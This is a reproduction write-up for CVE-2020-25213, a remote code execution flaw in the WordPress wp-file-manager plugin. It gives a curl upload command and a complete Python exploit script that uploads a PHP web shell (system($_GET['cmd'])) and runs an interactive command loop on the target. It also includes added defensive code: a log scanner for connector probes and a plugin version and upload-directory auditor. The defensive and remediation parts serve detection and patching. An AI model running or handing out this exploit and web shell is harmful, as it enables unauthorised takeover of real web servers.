CVE-2020-25213 WordPress Remote Code Execution Vulnerability Reproduction
0x01 Vulnerability overview
WordPress is a blog platform written in PHP; it lets you host a personal blog on a server running PHP and MySQL. Versions of the WordPress file manager plugin (wp-file-manager) before 6.9 contain a security vulnerability that allows a remote attacker to upload and execute arbitrary PHP code.
0x02 Affected versions
WordPress file manager (wp-file-manager) plugin, versions 6.0-6.8
0x03 Environment setup
phpstudy2018
WordPress
wp-file-manager 6.0
① Launch the WordPress installer
Installation tutorial reference link:
Or search Baidu; I won't go into detail here.
WordPress home page after a successful setup
Go to the admin dashboard and install the wp-file-manager 6.0 plugin
After the plugin is installed:
0x04 Vulnerability reproduction
Visit in the browser:
If the errUnknownCmd response shown below appears, the vulnerability exists
Use curl to upload a local file with a POST request:
curl -F cmd=upload -F target=l1_ -F upload[]=@test.php -XPOST "YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
Contents of test.php:
Visit the uploaded file to view it
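The reproduction above leaves a distinctive trail in the web server's access log, which is what a defender has to look for. The following is an added example, not part of the original writeup, that scans Apache combined-format log lines for the two events shown above: a direct request to connector.minimal.php (a GET yields the errUnknownCmd reply, a POST carries the upload) and a request for a .php file under lib/files. The log lines are constructed samples, and the severity labels are my own.

```python
import re
from urllib.parse import urlsplit

# Apache "combined" access-log layout, as written by a default phpstudy/Apache install.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# Paths from the reproduction above. The connector is the elFinder endpoint that is
# reachable without authentication; lib/files is where the uploaded file lands.
CONNECTOR = "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
UPLOAD_DIR = "/wp-content/plugins/wp-file-manager/lib/files/"


def classify(line):
    """Return (severity, reason) for one log line, or None when it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method = m.group("method")
    path = urlsplit(m.group("target")).path
    if path.endswith(CONNECTOR):
        # Legitimate use of the plugin goes through the WordPress admin, not a
        # direct hit on connector.minimal.php; any direct request is a probe,
        # and a POST is how the upload in the reproduction is delivered.
        if method == "POST":
            return ("high", "direct POST to elFinder connector (possible upload)")
        return ("medium", "direct probe of elFinder connector")
    if UPLOAD_DIR in path and path.lower().endswith(".php"):
        # A .php file should never exist in lib/files, let alone be served from it.
        return ("critical", "PHP file requested from the plugin upload directory")
    return None


def scan(lines):
    """Run classify() over log lines; return (ip, method, path, severity, reason) tuples."""
    findings = []
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        m = LOG_RE.match(line)
        findings.append((m.group("ip"), m.group("method"), urlsplit(m.group("target")).path) + hit)
    return findings


# Constructed sample lines (not from any real server): a normal page view,
# a GET probe of the connector, the upload POST, then a request for the uploaded file.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Sep/2020:12:00:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5123',
    '10.0.0.9 - - [07/Sep/2020:12:01:10 +0800] "GET /wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 98',
    '10.0.0.9 - - [07/Sep/2020:12:01:12 +0800] "POST /wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 312',
    '10.0.0.9 - - [07/Sep/2020:12:01:15 +0800] "GET /wordpress/wp-content/plugins/wp-file-manager/lib/files/test.php HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

Feeding a real access log in is a matter of `scan(open("access.log"))`; the medium hit alone is enough to justify a look, since nothing legitimate requests the connector directly, and a critical hit means a file has already been dropped and executed.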
0x05 Vulnerability POC & EXP
# -*- coding:utf-8 -*-
import json
import requests

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                  "Chrome/91.0.4472.124 Safari/537.36 "
}
url_tail = "/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
upfiles_path = "/wordpress/wp-content/plugins/wp-file-manager/lib/files"
payload = "?cmd="  # query parameter read by exploit.php

"""
Vulnerability check 1
Check whether the response contains errUnknownCmd
"""
def Check_1(url):
    url_2 = url + url_tail
    res1 = requests.get(url=url_2, headers=headers)
    text1 = res1.text
    text2 = json.loads(text1)
    key = json.dumps(text2)  # convert the JSON back into a string
    print(text2)
    key1 = "errUnknownCmd"
    if key1 in key:
        print("疑似漏洞存在")
        Next = input("是否进一步验证 Y or N :")
        if Next == "Y":
            Check_2(url)
    else:
        print("漏洞不存在")

"""
Vulnerability check 2
Check whether the uploaded PHP file responds correctly when visited
The uploaded PHP file here contains: <?php phpinfo() ?>
"""
def Check_2(url):
    data = {
        'cmd': 'upload',
        'target': 'l1_',
    }
    files = {
        'upload[0]': open('phpinfo.php', 'rb'),
    }
    url_3 = url + url_tail
    res = requests.post(url=url_3, headers=headers, data=data, files=files, verify=False)
    if res.status_code == requests.codes.ok:
        # print("上传成功!")
        d = res.json()
        p = d.get('added', [])[0].get('url')  # path of the uploaded file returned by the connector
        Finally_url = f'{url}{p}'
        res2 = requests.get(url=Finally_url, headers=headers)
        key2 = "PHP Version"
        if key2 in res2.text:
            print("CVE-2020-25213漏洞存在! ")
            flag = input("是否进行漏洞利用 Y or N :")
            if flag == "Y":
                while 1:
                    command = input("输入执行的命令: ")
                    if command == "exit":
                        break
                    exploit(url, command)
        else:
            print("漏洞不存在!")

"""
Exploitation
Upload a PHP file and call it to execute a command
exploit.php contains: <?php system($_GET['cmd']); ?>
"""
def exploit(url, command):
    data = {
        'cmd': 'upload',
        'target': 'l1_',
    }
    files = {
        'upload[0]': open('exploit.php', 'rb'),
    }
    url_2 = url + url_tail
    file_status = url + upfiles_path + "/exploit.php"
    # If exploit.php has already been uploaded, reuse it instead of uploading again
    res = requests.get(url=file_status, headers=headers, verify=False)
    if res.status_code == requests.codes.ok:
        Fin_url = file_status + payload + command
        res3 = requests.get(url=Fin_url, headers=headers)
        print(res3.text)
    else:
        res2 = requests.post(url=url_2, headers=headers, data=data, files=files, verify=False)
        if res2.status_code == requests.codes.ok:
            # print("上传成功!")
            d = res2.json()
            p = d.get('added', [])[0].get('url')
            url_3 = f'{url}{p}'
            Fin_url = url_3 + payload + command
            res2 = requests.get(url=Fin_url, headers=headers)
            print(res2.text)

def main():
    url = input("输入测试的URL:")
    Check_1(url)

if __name__ == '__main__':
    main()
I have only just started learning to write POCs and EXPs; if anything is wrong, experts are welcome to point it out _(:з」∠)_
0x06 Remediation
Update the wp-file-manager plugin to 6.9 or later
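To confirm on the server side whether an install falls in the affected range, and whether a file has already been dropped the way the reproduction above drops test.php, here is an added example that is not part of the original writeup. It reads the plugin's Version: header and lists any .php files under lib/files. It assumes the plugin's main file is file_manager.php (an assumption, not stated on the page), and the temporary plugin tree it builds for the demo is constructed, not a real install.

```python
import os
import re
import tempfile

# WordPress plugin header line, e.g. " * Version: 6.0". The main plugin file is
# assumed to be wp-file-manager/file_manager.php (assumption, not from the page).
VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*([0-9][0-9.]*)", re.MULTILINE)
MAIN_FILE = "file_manager.php"
UPLOAD_SUBDIR = os.path.join("lib", "files")


def parse_version(text):
    """Return the version string from a plugin header, or None if absent."""
    m = VERSION_RE.search(text)
    return m.group(1) if m else None


def version_tuple(v):
    return tuple(int(p) for p in v.split(".") if p.isdigit())


def is_vulnerable(v):
    """Affected range stated above: 6.0 through 6.8; 6.9 and later are fixed."""
    return (6, 0) <= version_tuple(v) < (6, 9)


def php_in_uploads(plugin_dir):
    """List .php files under lib/files; a clean install has none."""
    root = os.path.join(plugin_dir, UPLOAD_SUBDIR)
    found = []
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.lower().endswith(".php"):
                found.append(os.path.relpath(os.path.join(dirpath, n), root))
    return sorted(found)


def audit_plugin_dir(plugin_dir):
    """Combine the version check and the upload-directory sweep into one report."""
    with open(os.path.join(plugin_dir, MAIN_FILE), encoding="utf-8", errors="replace") as f:
        version = parse_version(f.read())
    return {
        "version": version,
        "vulnerable": version is not None and is_vulnerable(version),
        "php_in_uploads": php_in_uploads(plugin_dir),
    }


def build_sample_plugin_dir(version="6.0", dropped_file="test.php"):
    """Constructed plugin tree in a temp dir: a header with the given version and
    one stray PHP file in lib/files, mirroring the reproduction above."""
    d = tempfile.mkdtemp(prefix="wp-file-manager-")
    with open(os.path.join(d, MAIN_FILE), "w", encoding="utf-8") as f:
        f.write("<?php\n/*\n * Plugin Name: File Manager\n * Version: %s\n */\n" % version)
    os.makedirs(os.path.join(d, UPLOAD_SUBDIR))
    with open(os.path.join(d, UPLOAD_SUBDIR, dropped_file), "w", encoding="utf-8") as f:
        f.write("<?php phpinfo(); ?>\n")
    return d


if __name__ == "__main__":
    print(audit_plugin_dir(build_sample_plugin_dir()))
```

On a real site, point `audit_plugin_dir` at `wp-content/plugins/wp-file-manager`; a version in range means update to 6.9 or later, and any entry in `php_in_uploads` means the update alone is not enough and the dropped file (and whatever it was used for) has to be dealt with as an incident.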